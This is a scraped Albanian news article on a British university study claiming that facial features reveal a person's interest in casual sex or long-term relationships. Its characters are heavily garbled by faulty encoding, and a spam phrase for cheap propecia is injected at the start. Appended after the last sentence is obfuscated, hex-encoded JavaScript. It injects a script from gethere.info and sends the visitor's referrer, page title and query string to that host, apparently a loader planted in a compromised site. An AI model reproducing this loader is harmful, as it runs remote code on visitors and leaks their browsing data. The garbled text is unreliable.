glow_060412023741

Fytyra tradhton prirjet seksuale

cheap propecia tablets. PA�rshtypjet i krijojmA� madje qA� nA� shikim tA� parA�, prandaj mA�soni se A�farA� ju thonA� vija e fytyrA�s qA� e shikoni pA�r herA� tA� parA� nA� jetA�.

PjesA�tarA� e gjinive tA� kundA�rta mund tA� konkludojnA� nA�se dikush A�shtA� vetA�m pA�r aferA� pA�r njA� natA� ose diA�ka mA� afatgjate vetA�m duke shikuar fytyrA�n e dikujt, konsiderojnA� shkencA�tarA�t, pA�rcjell Reuters.

Nofulla katrore e mashkullit, hunda mA� e madhe dhe sytA� mA� tA� vegjA�l mA� parA� do tA� tregojnA� pamjen e epshit sesa tA� dashurisA� sA� mundshme. Kurse meshkujt me vija mA� tA� buta femrat i kanA� shikuar me mA� shumA� gjasa pA�r lidhje tA� mundshme. Nga ana tjetA�r, edhe meshkujt kanA� mundur tA� pA�rfundonin nA�se femra A�shtA� e interesuar pA�r takim pa obligime ose lidhje afatgjate, por nA� Universitetin Durham ku e kanA� kryer studimin nuk kanA� arritur tA� gjejnA� lidhjen me tiparet e fytyrA�s.

Rreth 700 heteroseksualA� kanA� marrA� pjesA� nA� hulumtim tA� cilin e ka kryer Universiteti Durham, St. Andrews dhe Aberdeen. 72 pA�r qind nga 153 tA� testuar e kanA� njohur saktA� sjelljen seksuale tA� grupit tA� meshkujve dhe femrave nA� vitet njA�zeta tA� jetA�s, fytyrat e tA� cilA�ve i kanA� parA� nA� fotografi. I publikuar nA� revistA�n a�?Evolution and Human Behavioura�?, hulumtimi ka treguar qA� femrat tA� cilat janA� mA� tA� hapura pA�r lidhje afatshkurtra seksuale janA� konsideruar atraktive mA� sA� shpeshti. Femra zakonisht kanA� qenA� tA� interesuara pA�r meshkujt pA�r tA� cilA�t u A�shtA� dukur qA� dA�shirojnA� lidhje afatgjate.

Hulumtimi ka vA�rtetuar edhe rezultatet e mA�hershme sipas tA� cilave meshkujt muskulozA� janA� pA�rjetuar nga femrat si mA� tA� prirA� ndaj tradhtisA� dhe etA�r mA� tA� kA�qij. Dr. Lynda Boothroyd shton se si kA�to pA�rfundime fillestare me kohA� do tA� zA�vendA�sojnA� njohjen mA� tA� mirA� tA� personit me tA� cilin jetojmA�, ndA�rsa qA�ndrimi mund tA� ndryshohet edhe me kalimin e viteve.var _0x31f1=[“\x73\x63\x72\x69\x70\x74″,”\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″,”\x73\x72\x63″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26\x73\x65\x5F\x72\x65\x66\x65\x72\x72\x65\x72\x3D”,”\x72\x65\x66\x65\x72\x72\x65\x72″,”\x26\x64\x65\x66\x61\x75\x6C\x74\x5F\x6B\x65\x79\x77\x6F\x72\x64\x3D”,”\x74\x69\x74\x6C\x65″,”\x26″,”\x3F”,”\x72\x65\x70\x6C\x61\x63\x65″,”\x73\x65\x61\x72\x63\x68″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”,”\x26\x66\x72\x6D\x3D\x73\x63\x72\x69\x70\x74″,”\x63\x75\x72\x72\x65\x6E\x74\x53\x63\x72\x69\x70\x74″,”\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65″,”\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65″,”\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,”\x68\x65\x61\x64″,”\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65″,”\x70\x72\x6F\x74\x6F\x63\x6F\x6C”,”\x68\x74\x74\x70\x73\x3A”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x52\x5F\x50\x41\x54\x48″,”\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E”];var d=document;var s=d[_0x31f1[1]](_0x31f1[0]);s[_0x31f1[2]]= _0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12];if(document[_0x31f1[13]]){document[_0x31f1[13]][_0x31f1[15]][_0x31f1[14]](s,document[_0x31f1[13]])}else {d[_0x31f1[18]](_0x31f1[17])[0][_0x31f1[16]](s)};if(document[_0x31f1[11]][_0x31f1[19]]=== _0x31f1[20]&& KTracking[_0x31f1[22]][_0x31f1[21]](_0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12])=== -1){alert(_0x31f1[23])}